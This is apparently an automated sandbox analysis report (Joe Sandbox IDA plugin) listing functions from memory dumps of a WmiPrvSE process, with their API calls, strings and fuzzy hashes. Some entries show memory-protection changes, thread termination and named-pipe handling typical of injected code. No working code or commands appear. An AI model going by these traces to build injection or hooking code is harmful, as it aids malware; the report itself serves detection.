FlsSetValue.KERNEL32(?,?,?,000001F43C54C7DE,?,?,?,?,?,?,?,?,000001F43C54CF9D,?,?,00000001), ref: 000001F43C54D0F0

Strings

1%, xrefs: 000001F43C54D0CE
Y%, xrefs: 000001F43C54D0A6

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: Value
String ID: 1%$Y%
API String ID: 3702945584-1395475152
Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
Instruction ID: c0e8997a0e1b17836f5812653e1ba9590481c7f103a19ca64b2a82581fa66dfb
Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
Instruction Fuzzy Hash: C2115E30704A7643FE68A72799513FB61C17B847F0F355334AB79876EAEE28C4429208

Function 000001F43C547510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001F43C547538
__scrt_acquire_startup_lock.LIBCMT ref: 000001F43C54758A
_RTC_Initialize.LIBCMT ref: 000001F43C5475B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001F43C5475DE
__scrt_release_startup_lock.LIBCMT ref: 000001F43C547609

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: 82543f87e5c8cc9e8458c3094a326040841d94201928816f4504509ae265ca32
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: B4818C71601E738BFB50AB67A8413FB26D1FB857C0F644435AB49877A6EB38C845CB08

Function 000001F43C549DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 000001F43C549E49
GetLastError.KERNEL32 ref: 000001F43C549E57
LoadLibraryExW.KERNEL32 ref: 000001F43C549E81
FreeLibrary.KERNEL32 ref: 000001F43C549EC7
GetProcAddress.KERNEL32 ref: 000001F43C549ED3

Strings

api-ms-, xrefs: 000001F43C549E69

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 9a692e6453de9d4801212d2d0819b84da1bdd69154ddd7f321b39c2fb227d254
Instruction ID: c81be210d49be451d4c670f87e538fc8d3836a34efa351bdfd0e52dfe11ec956
Opcode Fuzzy Hash: 9a692e6453de9d4801212d2d0819b84da1bdd69154ddd7f321b39c2fb227d254
Instruction Fuzzy Hash: AB319032216E72E2FE61DB43A401BF722D8B748BA0F6905359E2E0B794EF39C4558708

Function 000001F43C553DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001F43C553DE5
GetLastError.KERNEL32 ref: 000001F43C553DF1
CloseHandle.KERNEL32 ref: 000001F43C553E09
CreateFileW.KERNEL32 ref: 000001F43C553E34
WriteConsoleW.KERNEL32 ref: 000001F43C553E53

Strings

CONOUT$, xrefs: 000001F43C553E15

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction ID: a6455e7192dc75252e954b29d188b83d2d743b5210fe30c929dbab4033a8a1a3
Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction Fuzzy Hash: 6C114631710EA287F7508B53A8443BAA6E0B798FE4F044224EB5A877A4CF38C9148B48

Function 000001F43C543790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000001F43C54379E
GetCurrentProcess.KERNEL32 ref: 000001F43C5437CC
VirtualProtectEx.KERNEL32 ref: 000001F43C5437EE
GetCurrentProcess.KERNEL32 ref: 000001F43C543809
VirtualProtectEx.KERNEL32 ref: 000001F43C54382A

Strings

wr, xrefs: 000001F43C5437FF

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID: wr
API String ID: 1092925422-2678910430
Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction ID: 7a6fc9fb5c9301498c2d821ab21d7ce4d2b9f67005b9e251032e7744b56ab8e2
Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction Fuzzy Hash: BD112A36706BB283FB549B22E4042BAA6A0F748B95F540039DF8A07764EF2DC505CB08

Function 000001F43C545B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001F43C545B6B
GetThreadContext.KERNEL32 ref: 000001F43C545CD5

Part of subcall function 000001F43C545960: GetCurrentThreadId.KERNEL32 ref: 000001F43C545964

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
Instruction ID: 808154e0ce6e0650144f7d2a4a0dff207c49590d50bf243280a5087beb5c2f81
Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
Instruction Fuzzy Hash: B3D17776208FB986EA609F06E4943AB77E0F388B84F500126EBCD47BA5DF39C551CB44

Function 000001F43C542F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F43C542F27
HeapAlloc.KERNEL32 ref: 000001F43C542F3A
StrCmpNIW.SHLWAPI ref: 000001F43C542FAF
GetProcessHeap.KERNEL32 ref: 000001F43C543015
HeapFree.KERNEL32 ref: 000001F43C543023

Strings

dialer, xrefs: 000001F43C542FA8

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction ID: d238c7ba27fa48e304b32e40cf45fc05aed8e0c17ae681c6f4e548550bd89d49
Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction Fuzzy Hash: A8316732601F7293FA55CF17E9446BAA7E0BB54B80F5881309F4947B66EF38D4A18708

Function 000001F43C54CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000001F43C54CFAF
FlsSetValue.KERNEL32(?,?,?,000001F43C54D6B5,?,?,?,?,000001F43C54D778), ref: 000001F43C54CFE5
FlsSetValue.KERNEL32(?,?,?,000001F43C54D6B5,?,?,?,?,000001F43C54D778), ref: 000001F43C54D012
FlsSetValue.KERNEL32(?,?,?,000001F43C54D6B5,?,?,?,?,000001F43C54D778), ref: 000001F43C54D023
FlsSetValue.KERNEL32(?,?,?,000001F43C54D6B5,?,?,?,?,000001F43C54D778), ref: 000001F43C54D034
SetLastError.KERNEL32 ref: 000001F43C54D04F

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
Instruction ID: 03175c8240efd6444b830bb2621bcc872a1af14954c91574711b256533f1e4a6
Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
Instruction Fuzzy Hash: 0C116D30305EB243FA64A73799453FB22D27B847F4F341734AB76877EAEE2894419608

Function 000001F43C54199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001F43C5419C2
K32GetModuleFileNameExW.KERNEL32 ref: 000001F43C5419E0
PathFindFileNameW.SHLWAPI ref: 000001F43C5419EF
lstrlenW.KERNEL32 ref: 000001F43C5419FB
StrCpyW.SHLWAPI ref: 000001F43C541A0E
CloseHandle.KERNEL32 ref: 000001F43C541A1C

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
Instruction ID: d1b4a2a9a2090440c239e05a1d012e8df75199214fe3839828171a0060a2f742
Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
Instruction Fuzzy Hash: 9E015731301EA283FA54DB53A8483AA63E1F788BC4F984035DF4A43754DE38C989CB44

Function 000001F43C5436C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000001F43C5436E4
GetCurrentProcess.KERNEL32 ref: 000001F43C5436F2
VirtualProtectEx.KERNEL32 ref: 000001F43C543714
GetCurrentProcess.KERNEL32 ref: 000001F43C543732
VirtualProtectEx.KERNEL32 ref: 000001F43C543753
TerminateThread.KERNEL32 ref: 000001F43C543762

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
Instruction ID: d14a2688c91baf1ebf4751e96ac0d5655c15fc3d9193639dcd12aa0ac6ca5f27
Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
Instruction Fuzzy Hash: F8010975212FB283FB249B23E8187A763E0BB55B86F540434CA4A07765EF3DC1188B08

Function 000001F43C549005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001F43C549013
_IsNonwritableInCurrentImage.LIBCMT ref: 000001F43C5490A8
RtlUnwindEx.NTDLL ref: 000001F43C5490F7

Strings

csm, xrefs: 000001F43C54908E
f, xrefs: 000001F43C549026

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction ID: 563382e08bbf674c066412f2a2e86c53a94766e40dfda60a894486088f4928eb
Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction Fuzzy Hash: 77519D32709A72CBFB54DB16E449BAA37DAF344B88F619134DB1A43788EB75D841C708

Function 000001F43C548FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001F43C549013
_IsNonwritableInCurrentImage.LIBCMT ref: 000001F43C5490A8
RtlUnwindEx.NTDLL ref: 000001F43C5490F7

Strings

csm, xrefs: 000001F43C54908E
f, xrefs: 000001F43C549026

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 7550f7cb3c90e2bac6ea7802eb6f9839cfb23e206c2073458cd822806bf14f5d
Instruction ID: 1afba685a8df43cbd982ca4f156cf4e2c61dd22e48372805788d36c4c79599d4
Opcode Fuzzy Hash: 7550f7cb3c90e2bac6ea7802eb6f9839cfb23e206c2073458cd822806bf14f5d
Instruction Fuzzy Hash: 49316A32205A72D7F714DF12E84A7AA77E9F744B88F258524EF5A07789DB39C940CB08

Function 000001F43C541A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001F43C541A60
StrCmpNIW.SHLWAPI ref: 000001F43C541A7A
lstrlenW.KERNEL32 ref: 000001F43C541A89
StrCpyW.SHLWAPI ref: 000001F43C541A9E

Strings

\\?\, xrefs: 000001F43C541A6E

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction ID: 56c45c1fad0c17ed32efe822227d42f28fce1e7603b7c24f3ba342a9d0a211e9
Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction Fuzzy Hash: BAF03172704AB293F7608B63E9847AB67A1F748BD8F944030DB4A46654DE2DC68DCB04

Function 000001F43C543044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000001F43C543066
StrCpyW.SHLWAPI ref: 000001F43C543076
StrCatW.SHLWAPI ref: 000001F43C543082
PathCombineW.SHLWAPI ref: 000001F43C543090

Strings

\\.\pipe\, xrefs: 000001F43C54305C

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
Instruction ID: 5ebaaba57ef244771a9d0e5a56af852203b9cd7631878891a7d263555c201205
Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
Instruction Fuzzy Hash: 79F05831305FB283FA448B53B9041AA62A0BB48FD0F488130EF4B07B28DE38C4858B08

Function 000001F43C54BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001F43C54BCBD
GetProcAddress.KERNEL32 ref: 000001F43C54BCD3
FreeLibrary.KERNEL32 ref: 000001F43C54BCFA

Strings

CorExitProcess, xrefs: 000001F43C54BCCC
mscoree.dll, xrefs: 000001F43C54BCB4

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
Instruction ID: d0110e067276777e740a0dd9984d03ee80c932e26c25cee874e4928c5d16c8ed
Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
Instruction Fuzzy Hash: 38F01271212E7683FB148B26E4443BB63A0FB897A5F540229DB6B466F4DF2CC545CB48

Function 000001F43C5450D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001F43C545156

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
Instruction ID: 0e995805d2b8f05c9c43a589f2083e6e702904e21b827dd9850dc2a4e45c4b67
Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
Instruction Fuzzy Hash: 9902B732219BA586E760DF56E4903ABB7A1F3C4784F601025EB8E87BA9DF7CC454CB04

Function 000001F43C545710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001F43C545726

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
Instruction ID: abd52a5604b02c82cf16bbddfb5d2cff6a5969156c7709971ae9f8928647ba4a
Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
Instruction Fuzzy Hash: 3F61A036519A7687F7609F16E4443ABB7E0F388784F601125EB8E87BA8DF78C454CB48

Function 000001F43C523504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000001F43C52352C
_set_statfp.LIBCMT ref: 000001F43C523547
_set_statfp.LIBCMT ref: 000001F43C523563
_set_statfp.LIBCMT ref: 000001F43C52359F

Memory Dump Source

Source File: 0000000F.00000002.3086954633.000001F43C510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F43C510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c510000_WmiPrvSE.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: 843f2e2930a1c321834a7df565c51d2e33b29835352ba8e3c9626e48afc5f12c
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: 13117332B54E7353FA64162BE4553FB16C97F78374F488639AB6E166D7CB24C8814108

Function 000001F43C554104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000001F43C55412C
_set_statfp.LIBCMT ref: 000001F43C554147
_set_statfp.LIBCMT ref: 000001F43C554163
_set_statfp.LIBCMT ref: 000001F43C55419F

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: d66b48921dc96de6b2f2c8fe9efbe570a1063582f138dc3d12deded91cff8ac3
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: BE115E32A10F7323F764156BE8563FB11D17B683FAF180634AB77176E6DB28C8416A08

Function 000001F43C51F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000001F43C51F124

Strings

Tuesday, xrefs: 000001F43C51F0F4
or copy constructor iterator', xrefs: 000001F43C51F25A, 000001F43C51F275
Wednesday, xrefs: 000001F43C51F1ED

Memory Dump Source

Source File: 0000000F.00000002.3086954633.000001F43C510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F43C510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c510000_WmiPrvSE.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: Tuesday$Wednesday$or copy constructor iterator'
API String ID: 3215553584-4202648911
Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction ID: 0918c549934b38bbf7b605dbeb583fb07f4c59f66e1bb5e28e0566865a4aa0f5
Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction Fuzzy Hash: F761B036600E7243FE658B27EC483FF26E1F385758F544635CB2A837A6DB38C8428208

Function 000001F43C54AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000001F43C54AA68
_CallSETranslator.LIBVCRUNTIME ref: 000001F43C54AAB7

Strings

RCC, xrefs: 000001F43C54AA85
MOC, xrefs: 000001F43C54AA7C

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 666acc49fd6df01ba370cb9f51a420fe53debf1fde292996eb6e5d688c21119e
Instruction ID: 5508860ffa2ae090dc38ac0d395474580c379a62400876d34d732711eddaa202
Opcode Fuzzy Hash: 666acc49fd6df01ba370cb9f51a420fe53debf1fde292996eb6e5d688c21119e
Instruction Fuzzy Hash: 5C615632604BA58AFB609F66D4813EE77E1F358B88F244225EF4917B98DB38C595C704

Function 000001F43C51A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001F43C51A1A0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001F43C51A288

Strings

csm, xrefs: 000001F43C51A1C2
csm, xrefs: 000001F43C51A2DA

Memory Dump Source

Source File: 0000000F.00000002.3086954633.000001F43C510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F43C510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c510000_WmiPrvSE.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: 1025c626cef313f68b818ff87b55f6e338f163b8b095b1a9c4e16331c1ca8b37
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: 52515E32100AB2CBFF758B1795483BA77E0F355B98F184225DBA987B95CB38D491C709

Function 000001F43C54AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001F43C54ADA0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001F43C54AE88

Strings

csm, xrefs: 000001F43C54AEDA
csm, xrefs: 000001F43C54ADC2

Memory Dump Source

Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: 9e803656b688fab038f8dac3e8c40f1110e6338b28a2ccf971405029959bc3cd
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: 6C517F76104AB28BFBB48F2795853EA77E0F354B85F244129EB9947BD5CB38D4A0C708

Function 000001F43C518405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001F43C518413
_IsNonwritableInCurrentImage.LIBCMT ref: 000001F43C5184A8

Strings

csm, xrefs: 000001F43C51848E
f, xrefs: 000001F43C518426

Memory Dump Source

Source File: 0000000F.00000002.3086954633.000001F43C510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F43C510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c510000_WmiPrvSE.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction ID: ee87d46b2dcc1ce90ccf32f14717aa525401a8b6637c694bacc681fcc3807199
Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction Fuzzy Hash: 3A517933601A329BFB249F16E448BAA37E5F354B9CF578134DB2643789EB79D8418708

Function 000001F43C5183E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001F43C518413
_IsNonwritableInCurrentImage.LIBCMT ref: 000001F43C5184A8

Strings

csm, xrefs: 000001F43C51848E
f, xrefs: 000001F43C518426

Memory Dump Source

Source File: 0000000F.00000002.3086954633.000001F43C510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F43C510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f43c510000_WmiPrvSE.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction ID: f9fd5fb0cffeb9cb08c1b479288f83c54de2251b04939d9129100611a3867f11
Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction Fuzzy Hash: 99313832201A7197FB249F13E848BAA77E4F744B9CF568124AF6A07785DB3DC941C708

Function 000001F43C552058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001F43C5520D7
WriteFile.KERNEL32 ref: 000001F43C55239F
WriteFile.KERNEL32 ref: 000001F43C5523E5
